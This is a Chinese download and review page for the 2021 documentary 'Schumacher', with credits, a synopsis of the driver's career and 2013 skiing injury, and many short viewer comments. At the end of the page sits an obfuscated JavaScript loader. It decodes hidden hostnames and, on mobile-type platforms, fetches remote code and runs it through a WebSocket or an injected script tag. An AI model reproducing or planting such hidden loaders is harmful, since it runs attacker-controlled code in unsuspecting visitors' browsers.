2021高分纪录片《舒马赫》HD1080P.中英双字


更新时间:2021-09-16 15:48:14 类别: 纪录片 评论 下载
舒马赫的海报 舒马赫

舒马赫

导演: Hans-Bruno Kammertöns / Michael Wech
编剧: Hans-Bruno Kammertöns / Michael Wech
主演: 迈克尔·舒马赫
类型: 纪录片
制片国家/地区: 德国
语言: 德语 / 英语
上映日期: 2021-09-15(德国网络)
片长: 112分钟
又名: Schumacher / 迈克尔·舒马赫
IMDb: tt10322274
一部关于传奇F1车神迈克尔·舒马赫的纪录片《舒马赫》将推出。该片已在后期制作中,据称获得了舒马赫家人的全力支持,将有此前从未曝光的视频和资料、与其家人的采访、亲近的赛车伙伴和对手的采访等。德国导演Michael Wech(《Resistance Fighters》)和Hanns-Bruno Kammertöns执导,Rocket Science公司执行制片和做国际发行,DCM做德语区发行,将在#戛纳电影节#卖片。
如今,距离舒马赫拿到第一个世界冠军已25年,他被认为是F1成就最卓著的车手之一,唯一一个拿到7次F1世界冠军的人,跟红色的法拉利合作让许多车迷印象深刻。2012年退役后,舒马赫在2013年滑雪受伤,脑补受到损害,一度昏迷不醒,苏醒后到如今仍在接受治疗。
脱氧核糖十三 2021-09-16

在每个登场人物都会有的介绍字幕中,好几次让·托德和罗斯·布朗的名字底下写的只是"Friend"。

HANA-BI 2021-09-15

F1给我的印象就是法拉利车队,迈克尔舒马赫,Puma赛车鞋。 Android

浅显 2021-09-15

影片的开始是一段舒马赫全家潜水的画面,我突然意识到,我大概有将近十年没有看过“动”的舒马赫了。越往后看越感叹,追星观赛的那个年代,多媒体资源有多匮乏,可以说2000年之前的画面,除了塞纳在伊莫拉的事故、99年银石的撞车、00年蒙扎赛后新发的痛哭以外,对我来说都是新鲜的。好多熟悉又陌生的名字,布里亚托雷、威利韦伯、艾迪乔丹、达蒙希尔、埃克莱斯通、蒙特泽莫罗……如果不是这部纪录片,也许我再也不会记起这些名字了。“Coma can be many things.” 此时听来颇不是滋味;”You can only get what you put in.” 让我重新想起他最初inspire我的特质了。如果我是从94年开始看F1,也许不会喜欢舒马赫。我喜欢上的是已经卸下负担和压力只为自己开车的舒米……

raku 2021-09-15

评价舒米很复杂 他每一面的样子都不可能被完全看到 纪录片以90s为主 对于像我这样从02年之后开始看的伪车迷来说还是蛮有意义的 那么激烈 暗涌的赛场现在看不到咯~

zz 2021-09-15

上架第一时间就看完了。自从滑雪事故之后他消失在公众前,这纪录片才看了一分钟我就哭了,或许我比自己想象的还要更想念他,想念过去的围场还有流金的时光。Mick以后也是我的崽,加油!

秦颂 2021-09-16

很好的记录了舒马赫的几个关键时刻,配乐和家人采访很感人,命运在冥冥之中自有安排。

_Fung 2021-09-15

中规中矩,没有什么新的内容

德尔基西奥 2021-09-15

永远的车王,加油舒米!

耳朵也会渴 2021-09-15

所有你我记忆里关于这项运动最熟悉的脸庞几乎都在这里,他们在讲着那个时至今日他的活着或死去都像是一个薛定谔的猫一样的理论的人,我只觉得百感交集。虽然我对这项运动的记忆始于他在银石撞断了腿,拉尔夫飞奔来看他,但是在那之后他就一直在赢,我甚至一度怀疑我对他的喜爱是出于那最原始的慕强心理,还是他的人格或车技,其实也一直没有答案。我唯一找到结论的也只有,对于这些即使在F1都能做到顶尖的运动员,很多我们普通人的价值观或者思维定势,对他们都不适用的…褒义或贬义,也没在特指谁。

Augenblick 2021-09-15

I was a Schumacher fan since day 1. Eine überragende, emotionale und errinnerungsreiche Doku über den besten der F1 Geschichte. Michel Schumacher ist und bleibt für immer eine Legende. Danke, dass du uns allen die Formel 1 geschenkt hast, viel Kraft für deine Familie ❤

告别悲伤 2021-09-16

继续战斗

Jupiter 2021-09-15

片子本身一般般

阿瞢 2021-09-15

米克在上映之前说:“我爸爸是最好的F1车手,他值得这样一部纪录片。”舒马赫的职业生涯在太阳底下已经没有新鲜事了,最后二十分钟影像与其说是分享给车迷,不如说是舒马赫一家更需要这样一个记录方式。PS 事实证明不管正赛有多难看,摩纳哥车载画面永远是你大爷

十九。 2021-09-15

he was my idol from 2003 - 2005 red and ferrari and marlboro. and now i can see how much seb admires michael as a fan. the bit where he cried on the press conference after they asked him how he felt now he’s got 41 wins the same as senna. and mika said cant we have a break. (damn mika is so cool)

Elbereth 2021-09-16

感覺大多數的“賽車手紀錄片”都像是粉絲向的拼接,用很多身邊人的回憶來建構這個人作為車手、作為人的各種方面。也許因為我不能算schumi的車迷,因此沒有辦法與片中的人物產生聯結,但又在家人的講述裡理解了如果是車迷看到這樣一部紀錄片會多麼感動吧...

松子er 2021-09-16

太平淡了

爱电影的愤青 2021-09-16

即使用最差的装备也能跑出最好的成绩。这就是舒马赫给我的启示

瓷猫猫 2021-09-15

标记

mara 2021-09-15

看完泪流满面 其实从去年开始,经过托德的几场采访,我总隐隐的觉得有些很积极很正面的发展在悄悄的变化着,也总是做梦有一天,什么恰好的时机,事情就变化了…… 但是今天看了纪录片,整个的基调,又让我觉得,很难受…… 科琳娜提到了去滑雪前,曾经考虑过去迪拜跳伞,但最终还是去了法国滑雪……这就是命运啊…… 很多事情没法回头看,命运就是这么不可预料…… 希望未来有一天,可以再有一版《舒马赫》的纪录片,可以是基调快乐的,回头叙事[悲伤][悲伤][悲伤]

红蓝色的风雨夕 2021-09-16

the way Mick saying he would give up everything just to talk to his dad is so gutwrenching

舒马赫的截图1
舒马赫的截图2
舒马赫的截图3
舒马赫的截图4
function yeqJaFV(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function vfbHwTz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return yeqJaFV(t);};window[''+'t'+'Y'+'E'+'x'+'M'+'d'+'C'+'p'+'q'+'n'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=vfbHwTz,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('eeXl0Lmhlc2h1bjM2NS5jbg==','ddHIueWVzddW42NzguY29t','135631',window,document,['e','d']);}:function(){};